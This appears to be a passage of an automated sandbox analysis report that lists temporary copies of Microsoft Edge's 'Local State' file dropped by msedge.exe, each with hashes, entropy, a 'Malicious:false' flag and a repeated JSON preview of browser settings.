                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2ec2b.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2ee5d.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2ee6d.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3152f.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3256b.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF326d2.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF326f2.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33c5e.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33c6e.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35c1b.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35c2b.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ff60.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
